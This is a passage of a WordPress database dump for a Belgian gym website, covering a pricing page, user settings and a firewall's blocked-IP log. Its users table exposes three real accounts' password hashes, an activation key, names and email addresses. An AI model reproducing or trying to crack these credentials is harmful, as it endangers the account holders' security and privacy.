(497, 3, '2015-09-02 17:07:48', '2015-09-02 17:07:48', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\"><img class=\"alignnone size-full wp-image-494\" alt=\"nouvelles seances CT\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\" width=\"900\" height=\"635\" /></a>\r\n\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-09-02 17:07:48', '2015-09-02 17:07:48', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);

-- --------------------------------------------------------

--
-- Structure de la table `www2_post_relationships`
--

CREATE TABLE `www2_post_relationships` (
  `relate_id` bigint(20) UNSIGNED NOT NULL,
  `post_id` bigint(20) UNSIGNED NOT NULL,
  `has_post_id` bigint(20) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www2_slideshow_plugin`
--

CREATE TABLE `www2_slideshow_plugin` (
  `id` int(11) NOT NULL,
  `thumbnail_url` varchar(1024) NOT NULL,
  `url` varchar(1024) NOT NULL,
  `slideshow_name` varchar(1024) DEFAULT 'default',
  `link` varchar(1024) NOT NULL DEFAULT 'http://',
  `description` varchar(5120) NOT NULL,
  `position` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www2_termmeta`
--

CREATE TABLE `www2_termmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www2_terms`
--

CREATE TABLE `www2_terms` (
  `term_id` bigint(20) UNSIGNED NOT NULL,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_terms`
--

INSERT INTO `www2_terms` (`term_id`, `name`, `slug`, `term_group`) VALUES
(1, 'Uncategorized', 'uncategorized', 0),
(2, 'Navigation', 'navigation', 0),
(3, 'test', 'test', 0);

-- --------------------------------------------------------

--
-- Structure de la table `www2_term_relationships`
--

CREATE TABLE `www2_term_relationships` (
  `object_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_term_relationships`
--

INSERT INTO `www2_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES
(1, 1, 0),
(16, 2, 0),
(15, 2, 0),
(14, 2, 0),
(24, 2, 0),
(25, 2, 0),
(150, 4, 0),
(150, 3, 0),
(148, 4, 0),
(148, 3, 0),
(371, 2, 0),
(471, 2, 0);

-- --------------------------------------------------------

--
-- Structure de la table `www2_term_taxonomy`
--

CREATE TABLE `www2_term_taxonomy` (
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_term_taxonomy`
--

INSERT INTO `www2_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES
(1, 1, 'category', '', 0, 1),
(2, 2, 'nav_menu', '', 0, 7),
(3, 3, 'collaborateur_worksite', '', 0, 2),
(4, 3, 'collaborateur_service', '', 0, 2);

-- --------------------------------------------------------

--
-- Structure de la table `www2_usermeta`
--

CREATE TABLE `www2_usermeta` (
  `umeta_id` bigint(20) UNSIGNED NOT NULL,
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_usermeta`
--

INSERT INTO `www2_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(1, 1, 'first_name', ''),
(2, 1, 'last_name', ''),
(3, 1, 'nickname', 'admin'),
(4, 1, 'description', ''),
(5, 1, 'rich_editing', 'true'),
(6, 1, 'comment_shortcuts', 'false'),
(7, 1, 'admin_color', 'fresh'),
(8, 1, 'use_ssl', '0'),
(9, 1, 'show_admin_bar_front', 'true'),
(10, 1, 'wp_capabilities', 'a:2:{s:13:\"administrator\";b:1;s:26:\"total_slider_manage_slides\";b:1;}'),
(11, 1, 'wp_user_level', '10'),
(12, 1, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,total-slider-help-pointer'),
(13, 1, 'show_welcome_panel', '1'),
(14, 1, 'wp_dashboard_quick_press_last_post_id', '499'),
(15, 1, 'managenav-menuscolumnshidden', 'a:4:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}'),
(16, 1, 'metaboxhidden_nav-menus', 'a:2:{i:0;s:8:\"add-post\";i:1;s:12:\"add-post_tag\";}'),
(17, 1, 'wp_user-settings', 'hidetb=1&libraryContent=browse&editor=html&wplink=1'),
(18, 1, 'wp_user-settings-time', '1429688365'),
(19, 1, 'nav_menu_recently_edited', '2'),
(20, 2, 'first_name', 'Julie'),
(21, 2, 'last_name', 'Pierrard'),
(22, 2, 'nickname', 'Julie'),
(23, 2, 'description', ''),
(24, 2, 'rich_editing', 'true'),
(25, 2, 'comment_shortcuts', 'false'),
(26, 2, 'admin_color', 'fresh'),
(27, 2, 'use_ssl', '0'),
(28, 2, 'show_admin_bar_front', 'true'),
(29, 2, 'wp_capabilities', 'a:1:{s:6:\"editor\";b:1;}'),
(30, 2, 'wp_user_level', '7'),
(31, 2, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media'),
(32, 2, 'wp_dashboard_quick_press_last_post_id', '399'),
(33, 2, 'wp_user-settings', 'editor=tinymce&hidetb=1'),
(34, 2, 'wp_user-settings-time', '1377249565'),
(35, 2, 'default_password_nag', ''),
(36, 3, 'first_name', ''),
(37, 3, 'last_name', ''),
(38, 3, 'nickname', 'Pablo'),
(39, 3, 'description', ''),
(40, 3, 'rich_editing', 'true'),
(41, 3, 'comment_shortcuts', 'false'),
(42, 3, 'admin_color', 'fresh'),
(43, 3, 'use_ssl', '0'),
(44, 3, 'show_admin_bar_front', 'true'),
(45, 3, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'),
(46, 3, 'wp_user_level', '10'),
(47, 3, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(48, 3, 'wp_dashboard_quick_press_last_post_id', '489'),
(49, 3, 'wp_user-settings', 'editor=html&libraryContent=browse&imgsize=full'),
(50, 3, 'wp_user-settings-time', '1441213598');

-- --------------------------------------------------------

--
-- Structure de la table `www2_users`
--

CREATE TABLE `www2_users` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(64) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(60) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_users`
--

INSERT INTO `www2_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'admin', '$P$BTxsluD39ZNDDlm.YtLuQVMqrm.eH0/', 'admin', 'dpierrard@gmail.com', '', '2013-05-23 18:04:49', '$P$BxqH6HRM5.Jjnlf4TrMo0kny8TupwD/', 0, 'admin'),
(2, 'Julie', '$P$BgQ7uEA82zTYq3q0onbcq/W0rc8syx0', 'julie', 'juliepierrard@hotmail.com', '', '2013-08-23 09:08:58', '', 0, 'Julie Pierrard'),
(3, 'Pablo', '$P$BogLy0dg73K6JpgjPUqkqNJar.mmff.', 'pablo', 'wepion@gmail.com', '', '2015-09-02 16:42:58', '', 0, 'Pablo');

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfBadLeechers`
--

CREATE TABLE `www2_wfBadLeechers` (
  `eMin` int(10) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `hits` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfBlockedIPLog`
--

CREATE TABLE `www2_wfBlockedIPLog` (
  `IP` int(10) UNSIGNED NOT NULL,
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `unixday` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfBlockedIPLog`
--

INSERT INTO `www2_wfBlockedIPLog` (`IP`, `countryCode`, `blockCount`, `unixday`) VALUES
(1829643291, 'FR', 1, 17339),
(19917958, 'TH', 1, 17339),
(1091807106, 'US', 1, 17339),
(3139973540, 'BR', 1, 17339),
(1442374565, 'SK', 1, 17339),
(3032436716, 'PH', 1, 17334),
(3358968011, 'BR', 1, 17334),
(3532827868, 'JP', 1, 17334),
(3682725338, 'CN', 9, 17334),
(1442374564, 'SK', 1, 17334),
(2875375532, 'TH', 1, 17334),
(3154288046, 'RS', 1, 17334),
(657627066, 'PK', 1, 17334),
(418884769, 'US', 1, 17334),
(1521628389, 'CZ', 1, 17334),
(3115319218, '', 1, 17334),
(2975005806, 'BR', 1, 17334),
(1516638931, 'FR', 1, 17335),
(3682725338, 'CN', 9, 17335),
(1705472359, 'AU', 1, 17335),
(704366584, 'MA', 1, 17335),
(1892043087, 'PH', 1, 17335),
(3318955358, 'NG', 1, 17335),
(3583324965, 'HR', 1, 17335),
(2979849631, 'BR', 1, 17335),
(1293700813, 'MK', 1, 17335),
(703027240, 'TN', 1, 17335),
(1935748769, 'IN', 1, 17335),
(1700951514, 'NZ', 1, 17335),
(1336721696, 'HU', 1, 17335),
(2376729141, 'GB', 1, 17336),
(2946418994, 'PH', 1, 17336),
(1675930294, 'CA', 1, 17336),
(1539837014, 'UA', 2, 17336),
(2970345110, 'BR', 1, 17336),
(3124507901, 'AR', 1, 17336),
(3682725338, 'CN', 4, 17336),
(1547655939, 'LV', 1, 17336),
(1332056195, 'RS', 1, 17336),
(1517874559, 'FR', 1, 17333),
(1439252880, 'BE', 1, 17333),
(1892747498, 'PH', 1, 17333),
(2192896078, 'RS', 1, 17333),
(1476942175, 'ES', 1, 17333),
(1539837019, 'UA', 1, 17332),
(2996915206, 'KW', 1, 17332),
(1833145697, 'IL', 1, 17332),
(3743340614, 'IN', 1, 17332),
(1868300323, 'IN', 1, 17332),
(1814215517, 'US', 1, 17332),
(3682725338, 'CN', 6, 17339),
(3305249319, 'TN', 1, 17338),
(2945352912, 'MY', 1, 17338),
(1337055094, 'IL', 1, 17338),
(1021415560, 'AU', 1, 17338),
(1556308942, 'DE', 1, 17338),
(1337221594, 'IL', 1, 17338),
(832017728, 'PH', 1, 17338),
(3661641996, 'CN', 1, 17338),
(2945386850, 'MY', 1, 17338),
(1053979479, 'FR', 1, 17338),
(2050666736, 'NZ', 1, 17333),
(3682725338, 'CN', 7, 17333),
(1892867061, 'PH', 1, 17333),
(3583324972, 'HR', 1, 17332),
(3374681884, 'BR', 1, 17338),
(3682725338, 'CN', 8, 17338),
(3192913058, 'VE', 1, 17337),
(1466596995, 'DE', 20, 17337),
(1892921625, 'PH', 1, 17337),
(1733567786, '', 1, 17337),
(2982565155, 'BR', 1, 17337),
(3207991142, 'BR', 1, 17337),
(3682725338, 'CN', 7, 17337),
(1539837019, 'UA', 1, 17337),
(2946425103, 'PH', 1, 17337),
(1442664703, 'EE', 1, 17337),
(1451215676, 'RO', 1, 17336),
(529855267, 'RU', 1, 17313),
(3170385964, 'SA', 1, 17313),
(1539836981, 'UA', 2, 17313),
(1835212154, 'RO', 1, 17313),
(3489067105, 'US', 40, 17313),
(1042038966, 'PT', 1, 17313),
(1828725654, 'FR', 1, 17312),
(783835753, 'SA', 1, 17312),
(1534992972, 'ES', 1, 17312),
(1828725649, 'FR', 1, 17312),
(3387838170, 'TT', 1, 17312),
(781668949, 'UA', 1, 17312),
(1495116718, 'ES', 1, 17312),
(2030594922, 'CN', 1, 17312),
(1563679021, 'IT', 1, 17312),
(2949647692, 'KR', 1, 17312),
(1046956164, 'GR', 1, 17312),
(3397466494, 'TH', 1, 17312),
(1760853483, 'US', 1, 17311),
(3242600154, 'IT', 1, 17310),
(3590043248, 'FR', 1, 17310),
(1079652533, 'US', 1, 17306),
(3497113622, 'US', 1, 17306),
(3056768804, 'SG', 1, 17306),
(1586073137, 'DK', 1, 17307),
(1119841390, 'US', 1, 17307),
(598138358, 'US', 1, 17307),
(3497114222, 'US', 1, 17307),
(3105930270, 'PT', 1, 17307),
(3476728705, 'US', 1, 17307),
(3280140082, 'IT', 1, 17307),
(1168360410, 'US', 1, 17307),
(3586257058, 'NL', 1, 17307),
(1741512757, '', 1, 17307),
(1833311020, 'RU', 1, 17308),
(3237921028, 'US', 1, 17308),
(1729627112, 'HK', 1, 17308),
(1495980045, 'RO', 1, 17308),
(3163163411, 'DE', 1, 17309),
(842965149, 'US', 1, 17309),
(3635199372, 'US', 1, 17309),
(3497113622, 'US', 2, 17310),
(842969123, 'US', 1, 17310),
(1732504330, '', 1, 17310),
(3098024843, 'US', 1, 17294),
(2111103174, 'VN', 1, 17294),
(762746819, '', 3, 17294),
(3527006264, 'ID', 1, 17294),
(3164982411, 'FR', 1, 17294),
(3059525007, 'CN', 1, 17294),
(521678460, 'ES', 1, 17294),
(1743622318, 'VN', 1, 17294),
(1578617924, 'FR', 1, 17294),
(736163900, 'TW', 1, 17295),
(3590043250, 'FR', 1, 17295),
(1299175467, 'GB', 1, 17295),
(1743847615, 'AU', 1, 17297),
(2513063543, 'DE', 1, 17297),
(1570692602, 'NL', 1, 17297),
(2901752882, 'US', 1, 17297),
(1572433768, 'CZ', 1, 17297),
(469651732, 'TH', 2, 17292),
(2988470183, 'FR', 3, 17292),
(3164982411, 'FR', 3, 17292),
(3353828771, 'US', 2, 17292),
(702768013, 'TN', 1, 17284),
(2873895206, 'IN', 1, 17284),
(2058018895, 'IN', 1, 17284),
(608761984, 'ID', 1, 17284),
(1549131029, 'RO', 1, 17284),
(3197714889, 'VE', 1, 17285),
(2979895540, 'BR', 1, 17285),
(3039577960, 'AR', 1, 17285),
(3304677463, 'ZA', 1, 17285),
(1023584817, 'IN', 1, 17285),
(1430349643, 'IL', 1, 17285),
(1149515385, 'US', 1, 17285),
(2917961944, 'US', 1, 17286),
(3195004720, 'AR', 1, 17287),
(773229120, 'IE', 1, 17288),
(1571457074, 'CZ', 1, 17289),
(794450239, 'CA', 1, 17289),
(3326600728, 'US', 1, 17289),
(3644686526, 'DK', 1, 17289),
(3497113801, 'US', 1, 17291),
(3497113622, 'US', 1, 17291),
(3497110456, 'US', 1, 17291),
(3590043250, 'FR', 1, 17291),
(3191614634, 'VE', 1, 17291),
(1138881296, 'US', 2, 17292),
(3069127338, 'MY', 1, 17292),
(3346287710, 'US', 1, 17292),
(1632245985, 'US', 1, 17292),
(831636304, 'PH', 1, 17284),
(1887828803, 'IN', 1, 17283),
(1396104586, 'ES', 1, 17283),
(3157204740, 'PL', 1, 17283),
(3382964636, 'MX', 1, 17283),
(637050808, 'PL', 1, 17283),
(28968311, 'IN', 1, 17283),
(621184356, 'GR', 1, 17283),
(3412761521, 'MY', 1, 17284),
(1317189474, 'BG', 1, 17283),
(2391196847, 'CA', 1, 17283),
(1892041857, 'PH', 1, 17283),
(3142072067, 'BR', 1, 17283),
(842254621, 'US', 1, 17281),
(2320235926, 'SG', 1, 17281),
(2399207350, 'US', 1, 17281),
(2637388761, 'ID', 1, 17281),
(3754818252, 'TH', 1, 17281),
(1741772220, '', 1, 17281),
(702756256, 'TN', 1, 17281),
(2943288819, 'PK', 1, 17281),
(2738198454, 'BD', 1, 17281),
(1401323221, 'BE', 1, 17281),
(1887842097, 'LK', 1, 17281),
(1293756220, 'MK', 1, 17281),
(1589523921, 'RU', 12, 17281),
(702589396, 'TN', 1, 17281),
(3017071845, 'BR', 1, 17281),
(2957549377, 'FI', 1, 17281),
(1565928623, 'RS', 1, 17281),
(3182212288, 'MX', 1, 17282),
(1223522106, 'US', 1, 17282),
(1590804861, 'NL', 1, 17282),
(3360841433, 'AR', 1, 17282),
(1589523921, 'RU', 26, 17282),
(832022104, 'PH', 1, 17282),
(702781337, 'TN', 1, 17282),
(1835651188, 'BA', 1, 17282),
(2760119799, 'IT', 20, 17282),
(1833643342, 'AM', 1, 17282),
(86750727, 'HR', 1, 17282),
(1589523921, 'RU', 34, 17283),
(3159244987, 'ES', 1, 17283),
(2630993580, '', 1, 17272),
(1855915268, 'MY', 1, 17272),
(2057822968, 'IN', 1, 17272),
(625844236, 'IT', 1, 17272),
(1308677291, 'HR', 1, 17272),
(1546989467, 'MK', 1, 17272),
(2050351307, 'PH', 1, 17272),
(2969824596, 'BR', 1, 17272),
(1833643342, 'AM', 1, 17272),
(1327449813, 'IT', 1, 17272),
(3237666864, 'US', 1, 17292),
(2111103174, 'VN', 1, 17292),
(762746819, '', 1, 17292),
(3098029782, 'US', 1, 17293),
(3098024846, 'US', 1, 17293),
(3069127338, 'MY', 2, 17293),
(3346287710, 'US', 1, 17293),
(2727364316, 'US', 4, 17293),
(3527006264, 'ID', 1, 17293),
(1893028934, 'VN', 1, 17293),
(633031051, 'FR', 1, 17293),
(1743622318, 'VN', 1, 17293),
(762746819, '', 1, 17293),
(2996829330, 'RU', 2, 17293),
(3098024781, 'US', 1, 17293),
(1053997316, 'FR', 1, 17293),
(1138881296, 'US', 1, 17293),
(3056763559, 'SG', 2, 17293),
(3098029701, 'US', 2, 17293),
(3423600883, 'US', 1, 17293),
(2202594575, 'CL', 1, 17293),
(2746000698, 'GB', 1, 17293),
(1741681534, '', 1, 17332),
(3231737508, 'US', 1, 17332),
(1547655939, 'LV', 1, 17332),
(3682725338, 'CN', 10, 17332),
(1053979353, 'FR', 1, 17331),
(3386002506, 'VE', 1, 17331),
(528486593, 'PL', 1, 17331),
(842965026, 'US', 1, 17331),
(2037512030, 'JP', 1, 17331),
(3233382727, 'US', 1, 17331),
(1547655939, 'LV', 1, 17331),
(3682725338, 'CN', 12, 17331),
(3682725338, 'CN', 4, 17330),
(2032808987, 'CN', 2, 17328),
(1840808480, 'RU', 20, 17328),
(1732504327, '', 1, 17328),
(1985724027, 'IN', 1, 17327),
(3063980351, 'AU', 1, 17326),
(136172254, 'US', 20, 17326),
(1601092177, 'IT', 1, 17325),
(2065606982, 'VN', 1, 17325),
(1728496878, 'MY', 20, 17324),
(3741061572, 'VN', 1, 17324),
(1109513350, 'US', 1, 17324),
(2745977144, 'GB', 1, 17324),
(96963116, 'DE', 20, 17324),
(1053979479, 'FR', 1, 17324),
(1168352192, 'US', 20, 17323),
(96963116, 'DE', 20, 17323),
(2014968716, 'CN', 1, 17323),
(3163163411, 'DE', 1, 17323),
(1984277895, 'VN', 1, 17323),
(788319630, 'NL', 1, 17322),
(96963116, 'DE', 20, 17322),
(1168352192, 'US', 20, 17322),
(3489067105, 'US', 20, 17322),
(1168352192, 'US', 20, 17321),
(2833926914, 'GT', 1, 17321),
(1307193800, 'NO', 1, 17321),
(874456664, 'US', 1, 17321),
(1707700163, 'CN', 1, 17321),
(1539837082, 'UA', 5, 17320),
(1539837019, 'UA', 1, 17320),
(1049988935, 'IT', 20, 17320),
(1539836946, 'UA', 1, 17320),
(3489067105, 'US', 20, 17320),
(1741512757, '', 1, 17320),
(96963116, 'DE', 20, 17320),
(96963116, 'DE', 20, 17319),
(1728496878, 'MY', 20, 17319),
(1266634707, 'US', 1, 17318),
(1707700163, 'CN', 1, 17318),
(788319630, 'NL', 1, 17318),
(1539837019, 'UA', 2, 17318),
(3489067105, 'US', 20, 17317),
(1539837019, 'UA', 1, 17317),
(3163163411, 'DE', 1, 17317),
(1049988935, 'IT', 20, 17317),
(2734175325, 'US', 1, 17316),
(3164986572, 'FR', 1, 17316),
(96963116, 'DE', 40, 17316),
(1563679021, 'IT', 1, 17314),
(3001689384, 'RU', 1, 17314),
(3415091724, 'MY', 1, 17314),
(3362989667, 'EC', 1, 17314),
(3415089988, 'MY', 1, 17314),
(3107039490, 'ES', 1, 17313),
(2949647692, 'KR', 1, 17313),
(1835212158, 'RO', 1, 17313),
(1828828346, 'FR', 1, 17313),
(2156323210, 'KR', 2, 17313),
(3254658399, 'ES', 1, 17314),
(529853472, 'RU', 1, 17313),
(3152885982, 'MX', 1, 17313),
(3254658403, 'ES', 1, 17313),
(3387838170, 'TT', 1, 17313),
(3151105913, 'MX', 1, 17313),
(1729627112, 'HK', 1, 17313),
(3168080791, 'RO', 1, 17313),
(3555103830, 'KR', 1, 17313),
(1563679021, 'IT', 1, 17313),
(2548839223, 'GB', 2, 17313),
(3254658391, 'ES', 1, 17313),
(3497113622, 'US', 1, 17299),
(1168365674, 'US', 1, 17299),
(1572433768, 'CZ', 1, 17299),
(1728585030, 'AU', 1, 17298),
(794439728, 'CA', 1, 17298),
(3116589525, '', 1, 17298),
(1119841390, 'US', 1, 17298),
(1835211794, 'RO', 1, 17314),
(3254658395, 'ES', 1, 17314),
(3254658598, 'ES', 1, 17314),
(3735412901, 'ID', 1, 17312),
(1845364905, 'UA', 1, 17312),
(3489067105, 'US', 40, 17312),
(1835212082, 'RO', 2, 17312),
(1941604657, 'PK', 1, 17312),
(3423600883, 'US', 1, 17294),
(794439728, 'CA', 1, 17293),
(1279978460, 'US', 1, 17293),
(3164986572, 'FR', 1, 17293),
(1578617924, 'FR', 1, 17293),
(2746000698, 'GB', 1, 17294),
(1066387086, 'US', 1, 17278),
(1837181866, 'BE', 1, 17280),
(1473126706, 'PL', 1, 17280),
(86724239, 'BA', 1, 17280),
(627635047, 'SA', 1, 17278),
(835553714, 'IN', 1, 17278),
(1459691243, 'IT', 1, 17280),
(1242501469, 'CA', 1, 17280),
(1484515861, 'FR', 1, 17280),
(1483800238, 'FI', 1, 17278),
(1741894664, '', 1, 17278),
(656634353, 'PK', 1, 17278),
(45319675, 'IR', 1, 17266),
(3191614634, 'VE', 1, 17293),
(2997180598, 'UA', 2, 17268),
(2036512991, 'NZ', 1, 17268),
(2567295251, 'SI', 1, 17267),
(1335820244, 'ES', 1, 17267),
(1372304315, 'ES', 1, 17277),
(3081456248, 'MY', 1, 17278),
(3356055950, 'BR', 1, 17278),
(1729276347, 'IN', 1, 17277),
(2548839248, 'GB', 1, 17266),
(1388568683, 'CH', 1, 17266),
(1728496878, 'MY', 20, 17266),
(3134227165, 'BR', 1, 17266),
(2630650147, '', 1, 17266),
(831661798, 'PH', 1, 17265),
(2030594922, 'CN', 1, 17265),
(1892753981, 'PH', 1, 17280),
(973646844, 'TH', 1, 17279),
(1300185300, 'IL', 1, 17279),
(1480982105, 'DE', 1, 17279),
(1075856298, 'DO', 1, 17279),
(1652555154, 'US', 1, 17279),
(462680889, 'BD', 1, 17279),
(693760773, 'KE', 1, 17279),
(1660897944, 'US', 1, 17279),
(756559839, 'US', 1, 17279),
(96963116, 'DE', 20, 17315),
(1539837113, 'UA', 109, 17315),
(700515628, 'ZA', 1, 17314),
(3586257058, 'NL', 1, 17314),
(2032732065, 'CN', 2, 17314),
(1539837019, 'UA', 1, 17314),
(781668949, 'UA', 1, 17314),
(1501163646, 'RO', 1, 17314),
(786077451, 'FR', 1, 17314),
(3397466494, 'TH', 1, 17314),
(1828828346, 'FR', 1, 17314),
(1342920287, 'FR', 1, 17314),
(48857242, 'IT', 1, 17314),
(3489067105, 'US', 20, 17314),
(3170385964, 'SA', 1, 17312),
(1042038966, 'PT', 1, 17312),
(1401863434, 'PL', 1, 17312),
(3254658598, 'ES', 1, 17312),
(3107039609, 'ES', 1, 17312),
(2997180598, 'UA', 1, 17272),
(3557016176, 'DE', 1, 17272),
(1781731329, 'IN', 1, 17270),
(838336850, 'IN', 1, 17271),
(1602695291, 'UA', 1, 17268),
(1487682955, 'FR', 1, 17268),
(694240377, 'DZ', 1, 17268),
(3159219059, 'ES', 1, 17267),
(1049988937, 'IT', 20, 17267),
(3528003588, 'CN', 1, 17266),
(1897363733, 'VN', 1, 17277),
(1331015039, 'FR', 1, 17277),
(656718336, 'PK', 1, 17277),
(3075658538, 'IN', 1, 17277),
(1311451404, 'DE', 1, 17277),
(18240054, 'IN', 1, 17276),
(2053535298, 'IN', 1, 17277),
(2807568394, 'CA', 1, 17277),
(3220923904, 'BR', 1, 17276),
(1197448705, 'US', 1, 17276),
(1449745144, 'RO', 1, 17283),
(1743079446, 'ID', 1, 17266),
(1495980045, 'RO', 1, 17266),
(3384842088, 'CR', 1, 17266),
(3630295265, 'US', 1, 17266),
(2420947331, 'DE', 1, 17266),
(3190692170, 'CL', 1, 17267),
(1176630934, 'CA', 1, 17266),
(1410995141, 'NL', 1, 17266),
(633011686, 'IT', 1, 17265),
(2631042583, '', 1, 17265),
(3423600883, 'US', 2, 17292),
(2746000698, 'GB', 1, 17292),
(2057770254, 'IN', 1, 17275),
(1517306635, 'FR', 1, 17274),
(1502215624, 'RO', 1, 17274),
(694713201, 'DZ', 1, 17275),
(2057397147, 'IN', 1, 17275),
(1380787961, 'RO', 1, 17274),
(1825994579, 'US', 1, 17274),
(3176910774, 'BR', 1, 17265),
(1744088829, 'PK', 1, 17265),
(1327441816, 'IT', 1, 17279),
(1868429218, 'IN', 1, 17278),
(3000994407, 'RS', 1, 17278),
(3452436806, 'CA', 1, 17277),
(1269756669, 'US', 1, 17274),
(1053969232, 'FR', 1, 17306),
(1168360410, 'US', 1, 17306),
(1427222478, 'NL', 1, 17300),
(1659124010, 'US', 1, 17273),
(2077463425, 'AU', 1, 17274),
(3173368969, 'BR', 1, 17274),
(3536047280, 'MY', 1, 17271),
(1394350159, 'PL', 1, 17271),
(1434732386, 'AZ', 1, 17305),
(1539837019, 'UA', 2, 17305),
(1539837019, 'UA', 1, 17304),
